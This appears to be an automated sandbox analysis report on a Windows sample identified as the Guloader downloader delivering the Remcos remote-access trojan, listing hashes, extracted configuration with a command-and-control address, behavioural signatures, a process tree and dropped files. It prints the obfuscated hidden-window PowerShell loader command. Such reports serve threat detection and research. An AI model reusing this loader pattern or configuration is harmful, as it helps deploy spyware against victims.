Analysis

  • max time kernel
    150s
  • max time network
    132s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    17-09-2024 07:40

General

  • Target

    PR1000231795.exe

  • Size

    749KB

  • MD5

    cae3afdd724de922b10dd64584e774f1

  • SHA1

    d03bc1c01bd39d1aac23a3bfddf36f47c99f0dcd

  • SHA256

    92d1e524ad186c9eee020e49e42a4b420b8ddaa5f2174690295786df3d9f7cd9

  • SHA512

    8ca15921c8fbd3ecd3cdb05e4587b3836ca71c14032fd80ea50b121e7c7d57e4ba6c58329188649ab52749e631b3fc41fbec56d0ae3160aaee41a0162f2abd8b

  • SSDEEP

    12288:mcBqxnyFHaxV22XOPIUuXiBi/ixxZskvmtPA9Ts0Xz2xZN8EwQUlE7WUC6uI2N6:mGqtyFHaxywzXiumxZNwAy0jmv8XQUOP

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

23.227.202.48:2404

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-UQVC8D

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Guloader,Cloudeye

    A shellcode-based downloader first seen in 2020.

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Runs PowerShell with the display window hidden.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\PR1000231795.exe
    "C:\Users\Admin\AppData\Local\Temp\PR1000231795.exe"
    1⤵
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1972
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Sustainment163=Get-Content 'C:\Users\Admin\AppData\Local\pyromanis\Fahrenheittermometret\Harquebusade\Vehefterne\Ewery.Cal';$Underretningernes=$Sustainment163.SubString(702,3);.$Underretningernes($Sustainment163)
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2784
      • C:\Program Files (x86)\windows mail\wabmig.exe
        "C:\Program Files (x86)\windows mail\wabmig.exe"
        3⤵
        • Suspicious use of NtCreateThreadExHideFromDebugger
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious use of SetWindowsHookEx
        PID:3028

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\ProgramData\remcos\logs.dat

    Filesize

    144B

    MD5

    8ac566e8ec0b30237cb375c7239897f1

    SHA1

    eb62807b17e63ec41af796825debf3071d40238a

    SHA256

    88c445a3dbbaaa32e83413580f0b29c21882ea81133a825891c64f85d4cfd932

    SHA512

    1faa2336e2180a15b45d4e63c5cc86d707724eb87bf213da6484dfa12aaaed9ba6026286a1f74d28c58d06ed8beae9bb8e9795cc89168808db6371f6b84666ed

  • C:\Users\Admin\AppData\Local\pyromanis\Fahrenheittermometret\Harquebusade\Vehefterne\Ewery.Cal

    Filesize

    70KB

    MD5

    c3441391a31d9f2d0e3a28796b372ed7

    SHA1

    17b1fbd3ed6e55a2fa9136d58a4c83dfe5b4d8a1

    SHA256

    c126133825166f5edd56a7bc04f1e62604896b169d2eb23259877e6c3d824da9

    SHA512

    5f8caf6dd323652d820baa7f6d9e58755edd4defaddc0694c1e2d425834fe47a31b4d2e69164ff7a11c7704497d1bf2d27607bd9d18861f96ae2302ca889e31d

  • C:\Users\Admin\AppData\Local\pyromanis\Fahrenheittermometret\Harquebusade\Velgennemproevet.Sub

    Filesize

    352KB

    MD5

    0f9a0ca4a24509bd1d2745a6df9103c4

    SHA1

    d17e12c3cd1c04e315fd978e33530c5e19e5d0d3

    SHA256

    fb5f515aebeaf042d08c97ae56cbf0bee9997f870447916da7a1127760468e3b

    SHA512

    dd1064f628b4443d3c3ccf27374dd587b1daa4a04442e4b61c19f71d6dc43a7faf5a37dcb187caaa5afa083d8c7bd07497bff2c7784b0064ad86dc2e6bf5ce98

  • memory/2784-23-0x0000000073CF0000-0x000000007429B000-memory.dmp

    Filesize

    5.7MB

  • memory/2784-11-0x0000000073CF0000-0x000000007429B000-memory.dmp

    Filesize

    5.7MB

  • memory/2784-12-0x0000000073CF0000-0x000000007429B000-memory.dmp

    Filesize

    5.7MB

  • memory/2784-16-0x0000000073CF0000-0x000000007429B000-memory.dmp

    Filesize

    5.7MB

  • memory/2784-17-0x0000000073CF0000-0x000000007429B000-memory.dmp

    Filesize

    5.7MB

  • memory/2784-18-0x0000000073CF0000-0x000000007429B000-memory.dmp

    Filesize

    5.7MB

  • memory/2784-19-0x0000000073CF0000-0x000000007429B000-memory.dmp

    Filesize

    5.7MB

  • memory/2784-10-0x0000000073CF0000-0x000000007429B000-memory.dmp

    Filesize

    5.7MB

  • memory/2784-21-0x0000000073CF0000-0x000000007429B000-memory.dmp

    Filesize

    5.7MB

  • memory/2784-13-0x0000000073CF0000-0x000000007429B000-memory.dmp

    Filesize

    5.7MB

  • memory/2784-9-0x0000000073CF1000-0x0000000073CF2000-memory.dmp

    Filesize

    4KB

  • memory/2784-25-0x0000000006160000-0x0000000008FFD000-memory.dmp

    Filesize

    46.6MB

  • memory/2784-22-0x0000000073CF0000-0x000000007429B000-memory.dmp

    Filesize

    5.7MB

  • memory/3028-27-0x0000000000950000-0x00000000019B2000-memory.dmp

    Filesize

    16.4MB

  • memory/3028-31-0x0000000000950000-0x00000000019B2000-memory.dmp

    Filesize

    16.4MB

  • memory/3028-34-0x0000000000950000-0x00000000019B2000-memory.dmp

    Filesize

    16.4MB

  • memory/3028-37-0x0000000000950000-0x00000000019B2000-memory.dmp

    Filesize

    16.4MB

  • memory/3028-26-0x00000000019C0000-0x000000000485D000-memory.dmp

    Filesize

    46.6MB

  • memory/3028-40-0x0000000000950000-0x00000000019B2000-memory.dmp

    Filesize

    16.4MB

  • memory/3028-43-0x0000000000950000-0x00000000019B2000-memory.dmp

    Filesize

    16.4MB